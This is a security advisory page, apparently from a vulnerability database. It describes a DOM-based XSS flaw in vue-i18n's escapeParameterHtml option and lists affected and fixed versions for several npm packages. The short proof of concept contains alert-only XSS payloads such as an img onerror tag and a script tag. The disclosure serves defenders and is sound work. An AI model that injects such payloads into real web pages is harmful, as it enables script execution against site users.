Data

Tools

Indexes

Applications

Experiments

Advisories

An open API service providing security vulnerability metadata for many open source software ecosystems.

GSA_kwCzR0hTQS14OHFwLXdxcW0tNTdwaM4ABKPO

Moderate CVSS: 5.3 EPSS: 0.00134% (0.33983 Percentile) EPSS:
Permalink JSON

vue-i18n's escapeParameterHtml does not prevent DOM-based XSS through its tag attributes

Affected Packages Affected Versions Fixed Versions
npm:petite-vue-i18n >= 11.0.0, < 11.1.10, >= 10.0.0, < 10.0.8 11.1.10, 10.0.8
3 Dependent packages
9 Dependent repositories
20,302 Downloads last month

Affected Version Ranges

All affected versions

10.0.0, 10.0.1, 10.0.2, 10.0.3, 10.0.4, 10.0.5, 10.0.6, 10.0.7, 11.0.0, 11.0.1, 11.1.0, 11.1.1, 11.1.2, 11.1.3, 11.1.4, 11.1.5, 11.1.6, 11.1.7, 11.1.8, 11.1.9

All unaffected versions

9.2.0, 9.2.1, 9.2.2, 9.3.0, 9.4.0, 9.4.1, 9.5.0, 9.6.0, 9.6.1, 9.6.2, 9.6.3, 9.6.4, 9.6.5, 9.7.0, 9.7.1, 9.8.0, 9.9.0, 9.9.1, 9.10.0, 9.10.1, 9.10.2, 9.11.0, 9.11.1, 9.12.0, 9.12.1, 9.13.0, 9.13.1, 9.14.0, 9.14.1, 9.14.2, 9.14.3, 9.14.4, 9.14.5, 10.0.8, 11.1.10, 11.1.11
npm:@intlify/vue-i18n-core >= 11.0.0, < 11.1.10, >= 10.0.0, < 10.0.8, >= 9.2.0, < 9.14.5 11.1.10, 10.0.8, 9.14.5
3 Dependent packages
0 Dependent repositories
13,839 Downloads last month

Affected Version Ranges

All affected versions

9.2.0, 9.2.1, 9.2.2, 9.3.0, 9.4.0, 9.4.1, 9.5.0, 9.6.0, 9.6.1, 9.6.2, 9.6.3, 9.6.4, 9.6.5, 9.7.0, 9.7.1, 9.8.0, 9.9.0, 9.9.1, 9.10.0, 9.10.1, 9.10.2, 9.11.0, 9.11.1, 9.12.0, 9.12.1, 9.13.0, 9.13.1, 9.14.0, 9.14.1, 9.14.2, 9.14.3, 9.14.4, 10.0.0, 10.0.1, 10.0.2, 10.0.3, 10.0.4, 10.0.5, 10.0.6, 10.0.7, 11.0.0, 11.0.1, 11.1.0, 11.1.1, 11.1.2, 11.1.3, 11.1.4, 11.1.5, 11.1.6, 11.1.7, 11.1.8, 11.1.9

All unaffected versions

9.14.5, 10.0.8, 11.1.10, 11.1.11
npm:@intlify/core-base >= 11.0.0, < 11.1.10, >= 10.0.0, < 10.0.8, >= 9.0.0, < 9.14.5 11.1.10, 10.0.8, 9.14.5
26 Dependent packages
6,081 Dependent repositories
5,823,303 Downloads last month

Affected Version Ranges

All affected versions

9.0.0, 9.1.0, 9.1.1, 9.1.2, 9.1.3, 9.1.4, 9.1.5, 9.1.6, 9.1.7, 9.1.8, 9.1.9, 9.1.10, 9.1.11, 9.2.0, 9.2.1, 9.2.2, 9.3.0, 9.4.0, 9.4.1, 9.5.0, 9.6.0, 9.6.1, 9.6.2, 9.6.3, 9.6.4, 9.6.5, 9.7.0, 9.7.1, 9.8.0, 9.9.0, 9.9.1, 9.10.0, 9.10.1, 9.10.2, 9.11.0, 9.11.1, 9.12.0, 9.12.1, 9.13.0, 9.13.1, 9.14.0, 9.14.1, 9.14.2, 9.14.3, 9.14.4, 10.0.0, 10.0.1, 10.0.2, 10.0.3, 10.0.4, 10.0.5, 10.0.6, 10.0.7, 11.0.0, 11.0.1, 11.1.0, 11.1.1, 11.1.2, 11.1.3, 11.1.4, 11.1.5, 11.1.6, 11.1.7, 11.1.8, 11.1.9

All unaffected versions

9.14.5, 10.0.8, 11.1.10, 11.1.11
npm:@intlify/core >= 11.0.0, < 11.1.10, >= 10.0.0, < 10.0.8, >= 9.0.0, < 9.14.5 11.1.10, 10.0.8, 9.14.5
6 Dependent packages
772 Dependent repositories
1,067,070 Downloads last month

Affected Version Ranges

All affected versions

9.0.0, 9.1.0, 9.1.1, 9.1.2, 9.1.3, 9.1.4, 9.1.5, 9.1.6, 9.1.7, 9.1.8, 9.1.9, 9.1.10, 9.1.11, 9.2.0, 9.2.1, 9.2.2, 9.3.0, 9.4.0, 9.4.1, 9.5.0, 9.6.0, 9.6.1, 9.6.2, 9.6.3, 9.6.4, 9.6.5, 9.7.0, 9.7.1, 9.8.0, 9.9.0, 9.9.1, 9.10.0, 9.10.1, 9.10.2, 9.11.0, 9.11.1, 9.12.0, 9.12.1, 9.13.0, 9.13.1, 9.14.0, 9.14.1, 9.14.2, 9.14.3, 9.14.4, 10.0.0, 10.0.1, 10.0.2, 10.0.3, 10.0.4, 10.0.5, 10.0.6, 10.0.7, 11.0.0, 11.0.1, 11.1.0, 11.1.1, 11.1.2, 11.1.3, 11.1.4, 11.1.5, 11.1.6, 11.1.7, 11.1.8, 11.1.9

All unaffected versions

9.14.5, 10.0.8, 11.1.10, 11.1.11
npm:vue-i18n >= 11.0.0, < 11.1.10, >= 10.0.0, < 10.0.8, >= 9.0.0, < 9.14.5 11.1.10, 10.0.8, 9.14.5
4,626 Dependent packages
42,353 Dependent repositories
6,975,901 Downloads last month

Affected Version Ranges

All affected versions

9.0.0, 9.1.0, 9.1.1, 9.1.2, 9.1.3, 9.1.4, 9.1.5, 9.1.6, 9.1.7, 9.1.8, 9.1.9, 9.1.10, 9.1.11, 9.2.0, 9.2.1, 9.2.2, 9.3.0, 9.4.0, 9.4.1, 9.5.0, 9.6.0, 9.6.1, 9.6.2, 9.6.3, 9.6.4, 9.6.5, 9.7.0, 9.7.1, 9.8.0, 9.9.0, 9.9.1, 9.10.0, 9.10.1, 9.10.2, 9.11.0, 9.11.1, 9.12.0, 9.12.1, 9.13.0, 9.13.1, 9.14.0, 9.14.1, 9.14.2, 9.14.3, 9.14.4, 10.0.0, 10.0.1, 10.0.2, 10.0.3, 10.0.4, 10.0.5, 10.0.6, 10.0.7, 11.0.0, 11.0.1, 11.1.0, 11.1.1, 11.1.2, 11.1.3, 11.1.4, 11.1.5, 11.1.6, 11.1.7, 11.1.8, 11.1.9

All unaffected versions

0.0.0, 0.1.0, 0.1.1, 0.1.2, 0.2.0, 0.11.0, 1.0.0, 1.1.0, 1.1.1, 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.3.3, 2.4.0, 2.4.1, 3.0.0, 3.1.0, 3.1.1, 4.0.0, 4.0.1, 4.1.0, 4.2.0, 4.2.1, 4.2.2, 4.2.3, 4.3.0, 4.3.1, 4.4.0, 4.4.1, 4.5.0, 4.6.0, 4.7.0, 4.7.1, 4.7.2, 4.7.3, 4.7.4, 4.8.0, 4.9.0, 4.10.0, 5.0.0, 5.0.1, 5.0.2, 5.0.3, 6.0.0, 6.1.0, 6.1.1, 6.1.2, 6.1.3, 7.0.0, 7.0.1, 7.0.2, 7.0.3, 7.0.4, 7.0.5, 7.1.0, 7.1.1, 7.1.2, 7.2.0, 7.3.0, 7.3.1, 7.3.2, 7.3.3, 7.3.4, 7.4.0, 7.4.1, 7.4.2, 7.5.0, 7.6.0, 7.7.0, 7.8.0, 7.8.1, 8.0.0, 8.1.0, 8.1.1, 8.2.0, 8.2.1, 8.3.0, 8.3.1, 8.3.2, 8.4.0, 8.5.0, 8.6.0, 8.7.0, 8.8.0, 8.8.1, 8.8.2, 8.9.0, 8.10.0, 8.11.0, 8.11.1, 8.11.2, 8.12.0, 8.13.0, 8.14.0, 8.14.1, 8.15.0, 8.15.1, 8.15.2, 8.15.3, 8.15.4, 8.15.5, 8.15.6, 8.15.7, 8.16.0, 8.17.0, 8.17.1, 8.17.2, 8.17.3, 8.17.4, 8.17.5, 8.17.6, 8.17.7, 8.18.0, 8.18.1, 8.18.2, 8.19.0, 8.20.0, 8.21.0, 8.21.1, 8.22.0, 8.22.1, 8.22.2, 8.22.3, 8.22.4, 8.23.0, 8.24.0, 8.24.1, 8.24.2, 8.24.3, 8.24.4, 8.24.5, 8.25.0, 8.25.1, 8.26.0, 8.26.1, 8.26.2, 8.26.3, 8.26.4, 8.26.5, 8.26.6, 8.26.7, 8.26.8, 8.27.0, 8.27.1, 8.27.2, 8.28.0, 8.28.1, 8.28.2, 9.14.5, 10.0.8, 11.1.10, 11.1.11

Summary

The escapeParameterHtml: true option in Vue I18n is designed to protect against HTML/script injection by escaping interpolated parameters. However, this setting fails to prevent execution of certain tag-based payloads, such as <img src=x onerror=...>, if the interpolated value is inserted inside an HTML context using v-html.

This may lead to a DOM-based XSS vulnerability, even when using escapeParameterHtml: true, if a translation string includes minor HTML and is rendered via v-html.

Details

When escapeParameterHtml: true is enabled, it correctly escapes common injection points.

However, it does not sanitize entire attribute contexts, which can be used as XSS vectors via:

<img src=x onerror=alert(1)>

PoC

In your Vue I18n configuration:

const i18n = createI18n({
  escapeParameterHtml: true,
  messages: {
    en: {
      vulnerable: 'Caution: <img src=x onerror="{payload}">'
    }
  }
});

Use this interpolated payload:

const payload = '<script>alert("xss")</script>';
Render the translation using v-html (even not using v-html):

<p v-html="$t('vulnerable', { payload })"></p>
Expected: escaped content should render as text, not execute.

Actual: script executes in some environments (or the payload is partially parsed as HTML).

Impact

This creates a DOM-based Cross-Site Scripting (XSS) vulnerability despite enabling a security option (escapeParameterHtml) .

References:

Identifiers

GHSA-x8qp-wqqm-57ph

CVE-2025-53892

Risk

Severity

Moderate

CVSS

CVSS Score: 5.3

CVSS vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N

EPSS

EPSS Percentage: 0.00134

EPSS Percentile: 0.33983

Classification

General

Source

GitHub Advisory Database

Origin

Unspecified

Repository

https://github.com/intlify/vue-i18n

Date and time

Published

13 days ago

Updated

12 days ago

API

JSON